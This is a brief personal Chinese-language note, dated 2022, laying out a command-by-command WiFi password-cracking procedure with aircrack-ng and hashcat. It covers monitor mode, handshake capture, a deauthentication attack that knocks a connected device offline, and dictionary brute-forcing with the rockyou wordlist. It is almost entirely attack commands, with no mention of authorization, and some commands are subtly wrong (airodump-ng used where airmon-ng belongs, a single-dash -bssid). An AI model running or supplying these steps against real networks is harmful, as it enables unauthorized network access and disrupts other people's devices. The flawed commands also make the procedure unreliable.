查看无线网卡
ifconfig
开启无线网卡监听
sudo airodump-ng start wlan0
查看是否开启成功:
iwconfig
如果wlan0变为wlan0mon就是成功了
扫描wifi
sudo airodump-ng wlan0mon
对某一个路由器抓包
sudo airodump-ng -bssid (路由器mac地址) -c (对应channel) -w (抓到的包存放地址及命名) wlan0mon
如果以上操作可以看到有别的设备连接路由器,但抓不到包,需要攻击该设备,让其重新跟路由器握手
sudo aireplay-ng -0 0 -c (设备mac地址) -a (路由器mac地址) wlan0mon
抓到包之后字典暴力破解:
kali自带的破解工具
(1) 解压kali自带的字典
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
(2) 暴力破解
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.cap
用hashcat和GPU对暴力破解进行加速
(1) ubuntu16.04上安装hashcat
git clone https://github.com/hashcat/hashcat.git
make
sudo make install
测试是否运行GPU成功:
./example0.sh
./example400.sh
./example500.sh
(2) 将.cap的hash文件导成.hccap类型
方法一: 在线网站导出
https://hashcat.net/cap2hashcat
方法二(新版本hashcat测试不成功,在线导出也挺方便,这个问题不大):
kali命令行导出
sudo aircrack-ng robot-01.cap -j robot-01
(3) 暴力破解
./hashcat -m 22000 ***.hc22000 ./dict/dict.txt
2022.06.19 周天